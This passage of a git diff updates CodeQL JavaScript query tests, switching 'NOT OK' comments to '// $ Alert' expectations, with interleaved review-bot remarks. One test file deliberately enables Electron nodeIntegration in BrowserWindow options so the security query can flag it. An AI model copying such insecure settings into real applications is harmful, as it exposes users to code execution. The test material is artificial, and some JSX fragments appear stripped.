+++ b/javascript/ql/test/query-tests/Declarations/UnusedParameter/tst2.js @@ -1,18 +1,18 @@ -function f(x, y) { // NOT OK +function f(x, y) { // $ Alert return y; } -function g(x, y) { // OK +function g(x, y) { return y + arguments[0]; } -function h(x) { // OK +function h(x) { function inner() { x = 1; } } -// OK + /** * @param {*} x the first argument, deliberately unused * @param {*} y the second argument @@ -21,8 +21,7 @@ function K(x, y) { return y; } -// NOT OK -/** +/** // $ Alert * @param {*} x the first argument * @param {*} y the second argument */ @@ -30,7 +29,7 @@ function K(x, y) { return y; } -// OK + /** * @abstract * @param {*} x the first argument diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/Babelrc/importPragma.jsx b/javascript/ql/test/query-tests/Declarations/UnusedVariable/Babelrc/importPragma.jsx index ac3df7f815ce..a8c86768ad1a 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/Babelrc/importPragma.jsx +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/Babelrc/importPragma.jsx @@ -1,4 +1,4 @@ import { h } from 'preact'; // OK - JSX element uses 'h' after babel compilation -import { q } from 'preact'; // NOT OK - not used +import { q } from 'preact'; // $ Alert - not used export default (
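Review bot: In the `@@ -21,8 +21,7 @@` hunk the expectation is placed inside the JSDoc block, `/** // $ Alert`, so the tag becomes part of the doc comment's text and sits several lines above the declaration it belongs to, while every other case in this file carries the tag on the signature line (`function f(x, y) { // $ Alert`). Presumably the expectation framework anchors a multi-line comment's expectation on the comment's own location, in which case an alert reported on K's parameter line would not line up with it — worth confirming against the `.expected` output. Moving the tag to the signature, `function K(x, y) { // $ Alert`, keeps the file consistent either way; that signature line falls between this hunk and the following `@@ -30,7 +29,7 @@` one.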
Hello
); diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/UnusedIndexVariable.js b/javascript/ql/test/query-tests/Declarations/UnusedVariable/UnusedIndexVariable.js index a77c7545deee..7d76d97b96bb 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/UnusedIndexVariable.js +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/UnusedIndexVariable.js @@ -1,6 +1,6 @@ function sum(xs, i) { var res = 0; - for(;i++Hello); diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/importtype.ts b/javascript/ql/test/query-tests/Declarations/UnusedVariable/importtype.ts index 0fa2f18066c0..16e81a7f19de 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/importtype.ts +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/importtype.ts @@ -1,10 +1,10 @@ -// OK: `SomeInterface` is used in an `implements` clause +// OK - `SomeInterface` is used in an `implements` clause import SomeInterface from 'somewhere'; class SomeClass implements SomeInterface { } new SomeClass(); -import SomethingElse from 'somewhere'; // OK: SomethingElse is used in a type +import SomethingElse from 'somewhere'; // OK - SomethingElse is used in a type type T = `Now for ${SomethingElse}`; diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/interTypes.ts b/javascript/ql/test/query-tests/Declarations/UnusedVariable/interTypes.ts index bdcd767fae80..708ef01ba929 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/interTypes.ts +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/interTypes.ts @@ -1,4 +1,4 @@ -import { Foo, Bar } from "somewhere"; // OK +import { Foo, Bar } from "somewhere"; type FooBar = T extends [infer S extends Foo, ...unknown[]] diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/namespaceImportAsType.ts b/javascript/ql/test/query-tests/Declarations/UnusedVariable/namespaceImportAsType.ts index 8749b3b059e4..336c20798120 100644 
--- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/namespaceImportAsType.ts +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/namespaceImportAsType.ts @@ -1,6 +1,6 @@ -import * as X from "x"; // OK -import * as Y from "y"; // OK -import * as Z from "z"; // NOT OK +import * as X from "x"; +import * as Y from "y"; +import * as Z from "z"; // $ Alert function f(x: X) {} function g(x: Y.T) {} diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/node.js b/javascript/ql/test/query-tests/Declarations/UnusedVariable/node.js index 70e8264f7050..5478d1d02da7 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/node.js +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/node.js @@ -1,2 +1,2 @@ -// OK + module.exports = class C {} diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/react-jsx.js b/javascript/ql/test/query-tests/Declarations/UnusedVariable/react-jsx.js index ac9bf939e31e..8c43db101c4f 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/react-jsx.js +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/react-jsx.js @@ -1,2 +1,2 @@ -var React = x; // OK +var React = x; (); diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-1.js b/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-1.js index a68c0456cdf8..f58715a8a9b0 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-1.js +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-1.js @@ -1,2 +1,2 @@ -var React = require("probably-react"); // OK +var React = require("probably-react"); (); diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-2.js b/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-2.js index 7137d8a44a9d..c6bcc81929e6 100644 
--- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-2.js +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-2.js @@ -1,2 +1,2 @@ -var { React } = { React: require("probably-react") }; // OK +var { React } = { React: require("probably-react") }; (); diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-3.js b/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-3.js index 580680cdb682..c40e6c565daf 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-3.js +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-3.js @@ -1,2 +1,2 @@ -var { React } = require("probably-react"); // OK +var { React } = require("probably-react"); (); diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-in-other-scope.js b/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-in-other-scope.js index 9ba55169e39d..11f6763cf3f5 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-in-other-scope.js +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-in-other-scope.js @@ -1,5 +1,5 @@ (function() { - var React = require("probably-react"); // NOT OK + var React = require("probably-react"); // $ Alert }) (function() { (); diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/thisparam.ts b/javascript/ql/test/query-tests/Declarations/UnusedVariable/thisparam.ts index 07f817e287a8..5791afc6ed5c 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/thisparam.ts +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/thisparam.ts @@ -1,4 +1,4 @@ -import { Foo, Bar, Baz } from "somewhere"; // OK +import { Foo, Bar, Baz } from "somewhere"; export function f(this: Foo) {} 
diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/typeInTemplateLiteralTag.ts b/javascript/ql/test/query-tests/Declarations/UnusedVariable/typeInTemplateLiteralTag.ts index 8b157c18f8df..07c3bb0c50dc 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/typeInTemplateLiteralTag.ts +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/typeInTemplateLiteralTag.ts @@ -1,6 +1,6 @@ -import { SomeInterface } from 'somwhere1'; // OK -import { AnotherInterface } from 'somwhere2'; // OK -import { foo } from 'somewhere3'; // OK +import { SomeInterface } from 'somwhere1'; +import { AnotherInterface } from 'somwhere2'; +import { foo } from 'somewhere3'; let x = "world"; diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/typeoftype.ts b/javascript/ql/test/query-tests/Declarations/UnusedVariable/typeoftype.ts index 3a4c417daec3..5c5085a37285 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/typeoftype.ts +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/typeoftype.ts @@ -1,12 +1,12 @@ -import fs = require('fs') // OK -import http = require('http') // OK +import fs = require('fs') +import http = require('http') export var mockFs : typeof fs = {} export var mockRequest : typeof http.ServerRequest = {} export function f() { - let x = 4 // OK - let y = 5 // NOT OK + let x = 4 + let y = 5 // $ Alert var t : typeof x = 20 return t } diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/types.d.ts b/javascript/ql/test/query-tests/Declarations/UnusedVariable/types.d.ts index 130a2a1db926..62a86545a4e0 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/types.d.ts +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/types.d.ts @@ -1 +1 @@ -declare class UnusedClass {} // OK +declare class UnusedClass {} 
diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/underscore.js b/javascript/ql/test/query-tests/Declarations/UnusedVariable/underscore.js index 75eade9c6f82..e25cb72b32a5 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/underscore.js +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/underscore.js @@ -1,10 +1,10 @@ function f(a) { - const [a, // OK: used - _, // OK: starts with underscore - _c, // OK: starts with underscore - d, // OK: used - e, // NOT OK - f] // NOT OK + const [a, // OK - used + _, // OK - starts with underscore + _c, // OK - starts with underscore + d, // OK - used + e, // $ Alert + f] // $ Alert = a; return a + d; } diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/unusedShadowed.ts b/javascript/ql/test/query-tests/Declarations/UnusedVariable/unusedShadowed.ts index 14ec99e02b5c..a04efbed8e1c 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/unusedShadowed.ts +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/unusedShadowed.ts @@ -1,6 +1,6 @@ -import T from 'somewhere'; // NOT OK: `T` is unused (it is shadowed by another T) -import object from 'somewhere'; // NOT OK: `object` is unused (it is "shadowed" by a keyword) -import * as N from 'somewhere'; // OK: N is a namespace and thus not shadowed by 'interface N'. +import T from 'somewhere'; // $ Alert - `T` is unused (it is shadowed by another T) +import object from 'somewhere'; // $ Alert - `object` is unused (it is "shadowed" by a keyword) +import * as N from 'somewhere'; // OK - N is a namespace and thus not shadowed by 'interface N'. { var x: T = {}; diff --git a/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.js b/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.js index 5e1d0e95fb43..7cc8b5e4d5fb 100644 --- a/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.js 
+++ b/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.js @@ -1,7 +1,7 @@ const {BrowserWindow} = require('electron') function test() { - var unsafe_1 = { // NOT OK, both enabled + var unsafe_1 = { // $ Alert - both enabled webPreferences: { nodeIntegration: true, nodeIntegrationInWorker: true, @@ -11,7 +11,7 @@ function test() { } }; - var options_1 = { // NOT OK, `nodeIntegrationInWorker` enabled + var options_1 = { // $ Alert - `nodeIntegrationInWorker` enabled webPreferences: { plugins: true, nodeIntegrationInWorker: false, @@ -20,13 +20,13 @@ function test() { } }; - var pref = { // NOT OK, implicitly enabled + var pref = { // $ Alert - implicitly enabled plugins: true, webSecurity: true, sandbox: true }; - var options_2 = { // NOT OK, implicitly enabled + var options_2 = { // $ Alert - implicitly enabled webPreferences: pref, show: true, frame: true, @@ -34,7 +34,7 @@ function test() { minHeight: 300 }; - var safe_used = { // NOT OK, explicitly disabled + var safe_used = { // $ Alert - explicitly disabled webPreferences: { nodeIntegration: false, plugins: true, @@ -46,7 +46,7 @@ function test() { var w1 = new BrowserWindow(unsafe_1); var w2 = new BrowserWindow(options_1); var w3 = new BrowserWindow(safe_used); - var w4 = new BrowserWindow({width: 800, height: 600, webPreferences: {nodeIntegration: true}}); // NOT OK, `nodeIntegration` enabled + var w4 = new BrowserWindow({width: 800, height: 600, webPreferences: {nodeIntegration: true}}); // $ Alert - `nodeIntegration` enabled var w5 = new BrowserWindow(options_2); var w6 = new BrowserWindow(safe_used); } diff --git a/javascript/ql/test/query-tests/Expressions/BitwiseSignCheck/tst.js b/javascript/ql/test/query-tests/Expressions/BitwiseSignCheck/tst.js index 3006b9d28826..4ee166b91873 100644 --- a/javascript/ql/test/query-tests/Expressions/BitwiseSignCheck/tst.js +++ b/javascript/ql/test/query-tests/Expressions/BitwiseSignCheck/tst.js 
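Review bot: The explanation attached to `safe_used` in the `@@ -34,7 +34,7 @@` hunk contradicts its tag: `// $ Alert - explicitly disabled` reads as a reason not to alert, and the visible `nodeIntegration: false` is exactly what a reader would expect to be the safe case. Presumably another preference in the part of the literal outside the hunk is what the query flags, so the comment should name it, e.g. `var safe_used = { // $ Alert - nodeIntegration disabled, but <preference> still enables node integration` with the placeholder filled from the rest of the literal. That keeps the `$ Alert - <reason>` form used on `unsafe_1`, `options_1` and `w4` meaningful for the one case where the variable name says "safe". The `test()` function containing these literals starts and ends outside the hunk.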
@@ -6,18 +6,16 @@ console.log(bitIsSet(-1, 31)); // prints 'false' (x & 3) > 0; // this is fine -// OK + x = -1; console.log((x | 0) > (0)); // prints 'false' -// NOT OK -console.log((x >>> 0) > 0); // prints 'true' +console.log((x >>> 0) > 0); // prints 'true' // $ Alert + -// OK console.log((x << 16 >> 16) > 0); // prints 'false' -// OK + (x & 256) > 0; -// NOT OK -(x & 0x100000000) > 0; \ No newline at end of file +(x & 0x100000000) > 0; // $ Alert \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Expressions/CompareIdenticalValues/tst.js b/javascript/ql/test/query-tests/Expressions/CompareIdenticalValues/tst.js index e6b2568239f0..82c34116c62e 100644 --- a/javascript/ql/test/query-tests/Expressions/CompareIdenticalValues/tst.js +++ b/javascript/ql/test/query-tests/Expressions/CompareIdenticalValues/tst.js @@ -12,34 +12,33 @@ Rectangle.prototype.contains = function(x, y) { y < this.y+this.height); }; -// OK + "true" == true; -// OK + f() != f(23); -// NOT OK -(function() { }) == (function() {}); +(function() { }) == (function() {}); // $ Alert + - // OK x === y; -// OK + true === false; -// OK + function isNan(n) { return n !== n; } -// OK + function checkNaN(x) { if (x === x) // check whether x is NaN return false; return true; } -// OK (though wrong in other ways) +// OK - though wrong in other ways function same(x, y) { if (x === y) return true; diff --git a/javascript/ql/test/query-tests/Expressions/DuplicateProperty/tst.js b/javascript/ql/test/query-tests/Expressions/DuplicateProperty/tst.js index 3bf5add29910..aa9e955fdd08 100644 --- a/javascript/ql/test/query-tests/Expressions/DuplicateProperty/tst.js +++ b/javascript/ql/test/query-tests/Expressions/DuplicateProperty/tst.js 
@@ -1,12 +1,12 @@ var duplicate = { - "key": "value", // NOT OK: duplicated on line 5 + "key": "value", // $ Alert - duplicated on line 5 " key": "value", - "1": "value", // NOT OK: duplicated on line 11 - "key": "value", // NOT OK: duplicated on next line - 'key': "value", // NOT OK: duplicated on next line - key: "value", // NOT OK: duplicated on next line - \u006bey: "value", // NOT OK: duplicated on next line - "\u006bey": "value", // NOT OK: duplicated on next line + "1": "value", // $ Alert - duplicated on line 11 + "key": "value", // $ Alert - duplicated on next line + 'key': "value", // $ Alert - duplicated on next line + key: "value", // $ Alert - duplicated on next line + \u006bey: "value", // $ Alert - duplicated on next line + "\u006bey": "value", // $ Alert - duplicated on next line "\x6bey": "value", 1: "value" }; diff --git a/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/es2015.js b/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/es2015.js index f543395bc87c..07a81208a4ce 100644 --- a/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/es2015.js +++ b/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/es2015.js @@ -1,6 +1,6 @@ function* foo(){ var index = 0; while(index <= 2) - // OK + yield index++; } diff --git a/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/should.js b/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/should.js index 2bb1d46c4062..6b5b599f4b00 100644 --- a/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/should.js +++ b/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/should.js @@ -20,7 +20,7 @@ var myComplicatedPropertyDescriptor = (function(k) { })("get"); Object.defineProperty(Object.prototype, 'foo', myComplicatedPropertyDescriptor); -// OK: getters +// OK - getters (false).should.be.ok; (false).should; should.prototype.be; 
diff --git a/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/try.js b/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/try.js index a665423bd815..36bf5253ebdf 100644 --- a/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/try.js +++ b/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/try.js @@ -19,7 +19,7 @@ function try2(x) { function try3(x) { try { x.ordinaryProperty() - x.ordinaryProperty // NOT OK + x.ordinaryProperty // $ Alert return x; } catch (e) { return false; diff --git a/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/tst.js b/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/tst.js index e58a785b5aac..11fde389f858 100644 --- a/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/tst.js +++ b/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/tst.js 
@@ -1,83 +1,82 @@ -'use strict'; // OK -'use struct'; // OK (flagged by UnknownDirective.ql) -23; // NOT OK -void(23); // OK -23, foo(); // NOT OK -foo(23, 42); // OK -foo((23, bar())); // NOT OK -foo((bar(), 23)); // OK -1,f(); // NOT OK - -// OK +'use strict'; +'use struct'; // OK - flagged by UnknownDirective.ql +23; // $ Alert +void(23); +23, foo(); // $ Alert +foo(23, 42); +foo((23, bar())); // $ Alert +foo((bar(), 23)); +1,f(); // $ Alert + + /** * @type {function(int) : string} */ String.prototype.slice; -// OK + /** @typedef {(string|number)} */ goog.NumberLike; -// NOT OK -/** Useless */ +/** Useless */ // $ Alert x; -// OK (magic DOM property) +// OK - magic DOM property elt.clientTop; -// OK (xUnit fixture) +// OK - xUnit fixture [Fixture] function tst() {} -// OK: bad style, but most likely intentional +// OK - bad style, but most likely intentional (0, o.m)(); (0, o["m"])(); function tst() { - // OK: bad style, but most likely intentional + // OK - bad style, but most likely intentional (0, eval)("42"); } function f() { var x; - "foo"; // NOT OK + "foo"; // $ Alert } try { doSomethingDangerous(); } catch(e) { - new Error("Told you so"); // NOT OK - new SyntaxError("Why didn't you listen to me?"); // NOT OK - new Error(computeSnarkyMessage(e)); // NOT OK - new UnknownError(); // OK + new Error("Told you so"); // $ Alert + new SyntaxError("Why didn't you listen to me?"); // $ Alert + new Error(computeSnarkyMessage(e)); // $ Alert + new UnknownError(); } function g() { var o = {}; Object.defineProperty(o, "trivialGetter1", { get: function(){} }); - o.trivialGetter1; // OK + o.trivialGetter1; Object.defineProperty(o, "trivialNonGetter1", "foo"); - o.trivialNonGetter1; // NOT OK + o.trivialNonGetter1; // $ Alert var getterDef1 = { get: function(){} }; Object.defineProperty(o, "nonTrivialGetter1", getterDef1); - o.nonTrivialGetter1; // OK + o.nonTrivialGetter1; var getterDef2 = { }; unknownPrepareGetter(getterDef2); Object.defineProperty(o, 
"nonTrivialNonGetter1", getterDef2); - o.nonTrivialNonGetter1; // OK + o.nonTrivialNonGetter1; Object.defineProperty(o, "nonTrivialGetter2", unknownGetterDef()); - o.nonTrivialGetter2; // OK + o.nonTrivialGetter2; - (o: empty); // OK + (o: empty); - testSomeCondition() ? o : // NOT OK + testSomeCondition() ? o : // $ Alert doSomethingDangerous(); - consume(testSomeCondition() ? o : // OK + consume(testSomeCondition() ? o : doSomethingDangerous()); }; diff --git a/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/tst2.js b/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/tst2.js index 62f64f2f729a..0e66a95c166e 100644 --- a/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/tst2.js +++ b/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/tst2.js @@ -1,4 +1,3 @@ function tst2(eval) { - // NOT OK - (0, eval)("42"); + (0, eval)("42"); // $ Alert } diff --git a/javascript/ql/test/query-tests/Expressions/HeterogeneousComparison/tst.js b/javascript/ql/test/query-tests/Expressions/HeterogeneousComparison/tst.js index f500d4cdafce..a3b6b1fea45e 100644 --- a/javascript/ql/test/query-tests/Expressions/HeterogeneousComparison/tst.js +++ b/javascript/ql/test/query-tests/Expressions/HeterogeneousComparison/tst.js 
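Review bot: The expectation relocated onto the doc-comment line, `/** Useless */ // $ Alert`, now sits one line above the statement `x;` that the query reports, so the inline-expectation matcher will presumably record an expected alert on the comment line and an unexpected one on the `x;` line (unless the alert location is extended to cover the JSDoc, which I cannot tell from the hunk). Put the tag on the statement instead: keep `/** Useless */` as is and change the next line to `x; // $ Alert`. The other standalone `// NOT OK` comments in this hunk were folded onto the statement lines themselves, which is the form the rest of the file now uses.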
@@ -1,137 +1,128 @@ -// NOT OK -if (typeof window !== undefined) +if (typeof window !== undefined) // $ Alert console.log("browser"); -// OK + if (typeof window === "undefined") console.log("not a browser"); -// NOT OK -if ("Hello, world".indexOf("Hello" >= 0)) +if ("Hello, world".indexOf("Hello" >= 0)) // $ Alert console.log("It's in there."); -// OK + true < 1; -// OK + undefined == null; -// NOT OK -null == 0; +null == 0; // $ Alert -// NOT OK -switch ("hi") { +switch ("hi") { // $ Alert case 42: } -// NOT OK -Object.toString() + "!" == undefined; +Object.toString() + "!" == undefined; // $ Alert -// NOT OK -(+f() || !g() || (h() + k())) == undefined; +(+f() || !g() || (h() + k())) == undefined; // $ Alert -// NOT OK -if (!Module['load'] == 'undefined') { +if (!Module['load'] == 'undefined') { // $ Alert } function f(x) { return true; - // OK + return x === 42; } function g() { var number = 0; // number - // OK + number == "0"; - // NO OK - number == "zero"; + + number == "zero"; // $ Alert } -// NOT OK -0 < (Math.random() > 0.5 ? void 0 : [1, 2]); +0 < (Math.random() > 0.5 ? 
void 0 : [1, 2]); // $ Alert + -// OK '100' < 1000; -// OK (fvsvo "OK") +// OK - fvsvo "OK" 100 > ''; -// OK + new Date('foo') == 'Invalid Date'; -// OK + new String('bar') == 'bar'; -// OK + ({ valueOf: () => true } == true); -// OK + ({ valueOf: () => 42 } == 42); -// OK + ({ valueOf: () => 'hi' } == 'hi'); -// OK + ({ valueOf: () => null } == null); -// NOT OK, but not currently flagged since we conservatively -// assume that `new Date(123)` could return any object, not necessarily a Date +// assume that `new Date(123)` could return any object, not necessarily a Date // $ Alert - but not currently flagged since we conservatively new Date(123) == 123 function f(x1, x2, x3, x4, x5, x6){ - typeof x1 === 'object' && x1 !== null; // OK + typeof x1 === 'object' && x1 !== null; if (!x2) { x2 = new Error(); } - typeof x2 === 'object' && x2 !== null; // NOT OK: x2 cannot be null here + typeof x2 === 'object' && x2 !== null; // $ Alert - x2 cannot be null here if (x3) { - typeof x3 === 'object' && x3 !== null; // NOT OK: x3 cannot be null here + typeof x3 === 'object' && x3 !== null; // $ Alert - x3 cannot be null here } if (!x4) { - typeof x4 === 'object' && x4 !== null; // OK + typeof x4 === 'object' && x4 !== null; } if (!x5) { x5 = new Error(); } - x5 !== null; // NOT OK: x2 cannot be null here + x5 !== null; // $ Alert - x2 cannot be null here if (x6) { - x6 !== null; // NOT OK: x3 cannot be null here + x6 !== null; // $ Alert - x3 cannot be null here } } function g() { var o = {}; - o < "def"; // NOT OK + o < "def"; // $ Alert var p = { toString() { return "abc"; } }; - p < "def"; // OK + p < "def"; function A() {} var a = new A(); - a < "def"; // NOT OK + a < "def"; // $ Alert function B() {}; B.prototype = p; var b = new B(); - b < "def"; // OK + b < "def"; function C() { this.valueOf = function() { return 42; }; } var c = new C(); - c != 23; // OK + c != 23; null.valueOf = function() { return 42; }; - null == 42; // NOT OK + null == 42; // $ Alert true.valueOf = 
function() { return "foo" }; - true != "bar"; // NOT OK + true != "bar"; // $ Alert } @@ -139,54 +130,54 @@ function h() { var a = 42; var b = "42"; - a === "42"; // NOT OK - 42 === b // NOT OK - a === b; // NOT OK + a === "42"; // $ Alert + 42 === b // $ Alert + a === b; // $ Alert } function i() { "foo" === undefined - undefined === "foo" // NOT OK + undefined === "foo" // $ Alert var NaN = 0; // trick analysis to consider warning about NaN, for the purpose of testing pretty printing - NaN === "foo" // NOT OK + NaN === "foo" // $ Alert var Infinity = 0; // trick analysis to consider warning about Infinity, for the purpose of testing pretty printing - Infinity === "foo" // NOT OK + Infinity === "foo" // $ Alert } function k() { // tests for pretty printing of many types var t1 = 42; - t1 !== null; // NOT OK - null !== t1; // NOT OK + t1 !== null; // $ Alert + null !== t1; // $ Alert var t2 = unknown? t1: "foo"; - t2 !== null; // NOT OK - null !== t2; // NOT OK + t2 !== null; // $ Alert + null !== t2; // $ Alert var t3 = unknown? t2: undefined; - t3 !== null; // NOT OK - null !== t3; // NOT OK + t3 !== null; // $ Alert + null !== t3; // $ Alert var t4 = unknown? t3: true; - t4 !== null; // NOT OK - null !== t4; // NOT OK + t4 !== null; // $ Alert + null !== t4; // $ Alert var t5 = unknown? t4: function(){}; - t5 !== null; // NOT OK - null !== t5; // NOT OK + t5 !== null; // $ Alert + null !== t5; // $ Alert var t6 = unknown? t5: /t/; - t6 !== null; // NOT OK - null !== t6; // NOT OK + t6 !== null; // $ Alert + null !== t6; // $ Alert var t7 = unknown? t6: {}; - t7 !== null; // NOT OK - null !== t7; // NOT OK + t7 !== null; // $ Alert + null !== t7; // $ Alert var t8 = unknown? t8: new Symbol(); - t8 !== null; // NOT OK - null !== t8; // NOT OK + t8 !== null; // $ Alert + null !== t8; // $ Alert } 
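Review bot: The `new Date(123) == 123` case ends up with a garbled expectation: the first line of the old two-line comment was dropped and `// $ Alert - but not currently flagged since we conservatively` was appended to the second line, so the tag now sits on a comment line above the expression and asserts an alert that the comment itself says is not reported. Elsewhere in this commit the not-yet-flagged cases use `// $ MISSED: Alert` (for example `1n + 1; // $ MISSED: Alert` in ImplicitOperandConversion/tst.js), so the consistent form is `new Date(123) == 123 // $ MISSED: Alert - we conservatively assume that new Date(123) could return any object, not necessarily a Date` with the two stale comment lines removed. In the same hunk the rewritten tags `x5 !== null; // $ Alert - x2 cannot be null here` and `x6 !== null; // $ Alert - x3 cannot be null here` carry over a copy-paste error and should name x5 and x6.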
@@ -199,22 +190,22 @@ function l() { var t4 = unknown? 42: unknown? "foo": unknown? undefined: true; var t5 = unknown? t4: null - t2 !== t4; // NOT OK - t4 !== t2; // NOT OK - t3 !== t4; // NOT OK - t4 !== t3; // NOT OK + t2 !== t4; // $ Alert + t4 !== t2; // $ Alert + t3 !== t4; // $ Alert + t4 !== t3; // $ Alert - t2 !== t5; // NOT OK - t5 !== t2; // NOT OK - t3 !== t5; // NOT OK - t5 !== t3; // NOT OK + t2 !== t5; // $ Alert + t5 !== t2; // $ Alert + t3 !== t5; // $ Alert + t5 !== t3; // $ Alert } -1n == 1; // OK +1n == 1; (function tooGeneralLocalFunctions(){ function f1(x) { - if (x === "foo") { // OK, whitelisted + if (x === "foo") { // OK - whitelisted } } @@ -222,7 +213,7 @@ function l() { function f2(x, y) { var xy = o.q? x: y; - if (xy === "foo") { // NOT OK (not whitelisted like above) + if (xy === "foo") { // $ Alert - not whitelisted like above } } diff --git a/javascript/ql/test/query-tests/Expressions/ImplicitOperandConversion/tst.js b/javascript/ql/test/query-tests/Expressions/ImplicitOperandConversion/tst.js index 811ef9c576c9..523535b640e5 100644 --- a/javascript/ql/test/query-tests/Expressions/ImplicitOperandConversion/tst.js +++ b/javascript/ql/test/query-tests/Expressions/ImplicitOperandConversion/tst.js @@ -1,41 +1,36 @@ -// NOT OK -!method in obj; +!method in obj; // $ Alert + -// OK !(method in obj); -// OK + '__proto__' in obj; -// OK + 0 in obj; -// OK + ('$' + key) in obj; -// NOT OK -p in null; +p in null; // $ Alert + +0 in 'string'; // $ Alert -// NOT OK -0 in 'string'; -// OK p in {}; -// NOT OK -console.log("Setting device's bluetooth name to '%s'" % device_name); +console.log("Setting device's bluetooth name to '%s'" % device_name); // $ Alert -// NOT OK -if (!callback || !callback instanceof Function) { +if (!callback || !callback instanceof Function) { // $ Alert ; } -// OK + function cmp(x, y) { return (x > y) - (x < y); } -// OK + function cmp(x, y) { if (x > y) return 1; 
@@ -44,48 +39,42 @@ function cmp(x, y) { return 0; } -// OK + function cmp(x, y) { return (x > y) - (x < y); } -// NOT OK -1 + void 0 +1 + void 0 // $ Alert + -// OK o[true] = 42; function f() { var x; - // NOT OK - x -= 2; + x -= 2; // $ Alert } function g() { var x = 19, y; - // NOT OK - x %= y; + x %= y; // $ Alert } function h() { var x; - // NOT OK - ++x; + ++x; // $ Alert } function k() { var name; - // NOT OK - return `Hello ${name}!`; + return `Hello ${name}!`; // $ Alert } function l() { var x; - // NOT OK - x ** 2; + x ** 2; // $ Alert } -1n + 1; // NOT OK, but not currently flagged +1n + 1; // $ MISSED: Alert (function(){ let sum = 0; @@ -114,10 +103,10 @@ function l() { function m() { var x = 19, y = "string"; - x %= y; // NOT OK - x += y; // OK - x ||= y; // OK - x &&= y; // OK - x ??= y; // OK - x >>>= y; // NOT OK + x %= y; // $ Alert + x += y; + x ||= y; + x &&= y; + x ??= y; + x >>>= y; // $ Alert } diff --git a/javascript/ql/test/query-tests/Expressions/MissingAwait/tsTest.ts b/javascript/ql/test/query-tests/Expressions/MissingAwait/tsTest.ts index 4362c11a8e67..5f1774f1ab56 100644 --- 